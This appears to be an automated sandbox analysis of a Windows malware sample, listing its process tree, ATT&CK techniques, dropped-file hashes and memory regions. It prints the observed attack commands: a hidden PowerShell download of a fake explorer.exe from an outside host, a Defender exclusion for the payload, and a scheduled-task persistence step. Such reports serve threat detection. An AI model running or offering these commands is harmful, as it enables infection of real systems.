PID:1860

C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eDdYRRbouy.exe"
4⤵
PID:2008

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp79B3.tmp"
4⤵
- Creates scheduled task(s)
PID:428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\Admin\AppData\Roaming\explorer.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\explorer.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:380

C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
3⤵
- Executes dropped EXE
PID:916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eDdYRRbouy.exe"
4⤵
PID:1612

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7EF1.tmp"
4⤵
- Creates scheduled task(s)
PID:820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:568

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1928

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp7253.tmp
Filesize
1KB

MD5
92543664334086c748a2b854c622cccc

SHA1
59ea0d2fd304351e3aa4fed2b8461e213b41ff42

SHA256
349fec5a58e27ed8f20ffb6e9e599368334f1c8e0bcfc71437b5917e0cdff8e6

SHA512
2ff6d04ccbe1b20d09d34a09ac622909d944ab25ad2cb93882df5625a7bb0b119158129f1f4097c9008be5115d95a7ea8d841184e6ad8aaaf0bf07d67c3e0060

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp79B3.tmp
Filesize
1KB

MD5
92543664334086c748a2b854c622cccc

SHA1
59ea0d2fd304351e3aa4fed2b8461e213b41ff42

SHA256
349fec5a58e27ed8f20ffb6e9e599368334f1c8e0bcfc71437b5917e0cdff8e6

SHA512
2ff6d04ccbe1b20d09d34a09ac622909d944ab25ad2cb93882df5625a7bb0b119158129f1f4097c9008be5115d95a7ea8d841184e6ad8aaaf0bf07d67c3e0060

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7EF1.tmp
Filesize
1KB

MD5
92543664334086c748a2b854c622cccc

SHA1
59ea0d2fd304351e3aa4fed2b8461e213b41ff42

SHA256
349fec5a58e27ed8f20ffb6e9e599368334f1c8e0bcfc71437b5917e0cdff8e6

SHA512
2ff6d04ccbe1b20d09d34a09ac622909d944ab25ad2cb93882df5625a7bb0b119158129f1f4097c9008be5115d95a7ea8d841184e6ad8aaaf0bf07d67c3e0060

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e059af6db3ba71570851f278ac74b9d8

SHA1
275590c3151ddb5efa9010cc1706cdc7b1d33e7f

SHA256
096a0a00ee4e4f742305aa57624d401481aaffdc181a0fdba85d1347c71a1df3

SHA512
e4530bc2c15da55ddff313222e70222b9c6e8c30d87d6e8943c723a6baee5bebaa5115a55b1bcfaf696b62da5f539a4b73ded972b8aa4b478ec12d77c43fed39

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e059af6db3ba71570851f278ac74b9d8

SHA1
275590c3151ddb5efa9010cc1706cdc7b1d33e7f

SHA256
096a0a00ee4e4f742305aa57624d401481aaffdc181a0fdba85d1347c71a1df3

SHA512
e4530bc2c15da55ddff313222e70222b9c6e8c30d87d6e8943c723a6baee5bebaa5115a55b1bcfaf696b62da5f539a4b73ded972b8aa4b478ec12d77c43fed39

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e059af6db3ba71570851f278ac74b9d8

SHA1
275590c3151ddb5efa9010cc1706cdc7b1d33e7f

SHA256
096a0a00ee4e4f742305aa57624d401481aaffdc181a0fdba85d1347c71a1df3

SHA512
e4530bc2c15da55ddff313222e70222b9c6e8c30d87d6e8943c723a6baee5bebaa5115a55b1bcfaf696b62da5f539a4b73ded972b8aa4b478ec12d77c43fed39

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
e059af6db3ba71570851f278ac74b9d8

SHA1
275590c3151ddb5efa9010cc1706cdc7b1d33e7f

SHA256
096a0a00ee4e4f742305aa57624d401481aaffdc181a0fdba85d1347c71a1df3

SHA512
e4530bc2c15da55ddff313222e70222b9c6e8c30d87d6e8943c723a6baee5bebaa5115a55b1bcfaf696b62da5f539a4b73ded972b8aa4b478ec12d77c43fed39

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
\Users\Admin\AppData\Roaming\explorer.exe
Filesize
951KB

MD5
87b246b26208a9831a4372664c518c2c

SHA1
1599cbf0ee49dcb787866fbb7c297094ecd3ab4f

SHA256
27fd2ab0bbd65cbe5625932fa7ab1f484a06cbdff8868129f10cd92321d99daf

SHA512
4e7f5a217dbcd34eaadf867cd75acb23ae01730794ae8ac23a2428be5160fa8dff78b5b3e202a1e898e73126cea4fe19bf6a9f6457d136433d61e16435d69ff1

Download Submit
memory/268-73-0x0000000000000000-mapping.dmp

Download
memory/268-79-0x0000000004C10000-0x0000000004EE2000-memory.dmp

Filesize
2.8MB

Download
memory/268-76-0x00000000655E0000-0x0000000065B8B000-memory.dmp

Filesize
5.7MB

Download
memory/268-80-0x00000000655E0000-0x0000000065B8B000-memory.dmp

Filesize
5.7MB

Download
memory/380-91-0x0000000000000000-mapping.dmp

Download
memory/428-123-0x0000000000000000-mapping.dmp

Download
memory/820-135-0x0000000000000000-mapping.dmp

Download
memory/916-93-0x0000000000000000-mapping.dmp

Download
memory/916-149-0x0000000004880000-0x00000000048A2000-memory.dmp

Filesize
136KB

Download
memory/996-128-0x0000000004D60000-0x0000000004D82000-memory.dmp

Filesize
136KB

Download
memory/996-83-0x0000000000000000-mapping.dmp

Download
memory/1016-101-0x0000000000000000-mapping.dmp

Download
memory/1020-63-0x000000006ABF0000-0x000000006B19B000-memory.dmp

Filesize
5.7MB

Download
memory/1020-59-0x0000000000000000-mapping.dmp

Download
memory/1020-61-0x000000006ABF0000-0x000000006B19B000-memory.dmp

Filesize
5.7MB

Download
memory/1020-62-0x0000000004B20000-0x0000000005171000-memory.dmp

Filesize
6.3MB

Download
memory/1404-142-0x0000000000405CE2-mapping.dmp

Download
memory/1436-90-0x00000000655C0000-0x0000000065B6B000-memory.dmp

Filesize
5.7MB

Download
memory/1436-89-0x0000000004BF0000-0x0000000004EC2000-memory.dmp

Filesize
2.8MB

Download
memory/1436-85-0x0000000000000000-mapping.dmp

Download
memory/1612-151-0x00000000641C0000-0x000000006476B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-158-0x00000000641C0000-0x000000006476B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-132-0x0000000000000000-mapping.dmp

Download
memory/1620-68-0x0000000000000000-mapping.dmp

Download
memory/1620-99-0x0000000005C50000-0x0000000005CCC000-memory.dmp

Filesize
496KB

Download
memory/1620-98-0x0000000000620000-0x000000000062C000-memory.dmp

Filesize
48KB

Download
memory/1620-78-0x00000000005D0000-0x00000000005E4000-memory.dmp

Filesize
80KB

Download
memory/1620-77-0x00000000005C0000-0x00000000005D4000-memory.dmp

Filesize
80KB

Download
memory/1620-107-0x00000000045F0000-0x0000000004612000-memory.dmp

Filesize
136KB

Download
memory/1620-71-0x00000000009F0000-0x0000000000AE4000-memory.dmp

Filesize
976KB

Download
memory/1700-100-0x0000000000000000-mapping.dmp

Download
memory/1700-106-0x0000000063EF0000-0x000000006449B000-memory.dmp

Filesize
5.7MB

Download
memory/1700-109-0x0000000063EF0000-0x000000006449B000-memory.dmp

Filesize
5.7MB

Download
memory/1860-81-0x0000000000000000-mapping.dmp

Download
memory/1928-96-0x0000000000000000-mapping.dmp

Download
memory/1928-97-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmp

Filesize
8KB

Download
memory/1948-64-0x0000000000000000-mapping.dmp

Download
memory/1960-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1960-55-0x0000000070201000-0x0000000070203000-memory.dmp

Filesize
8KB

Download
memory/1960-58-0x0000000075451000-0x0000000075453000-memory.dmp

Filesize
8KB

Download
memory/1960-54-0x0000000072781000-0x0000000072784000-memory.dmp

Filesize
12KB

Download
memory/1960-57-0x00000000711ED000-0x00000000711F8000-memory.dmp

Filesize
44KB

Download
memory/1960-70-0x00000000711ED000-0x00000000711F8000-memory.dmp

Filesize
44KB

Download
memory/2008-119-0x0000000000000000-mapping.dmp

Download
memory/2040-126-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-121-0x0000000000405CE2-mapping.dmp

Download
memory/2040-117-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-110-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-108-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-112-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-120-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-150-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-118-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-115-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/2040-114-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download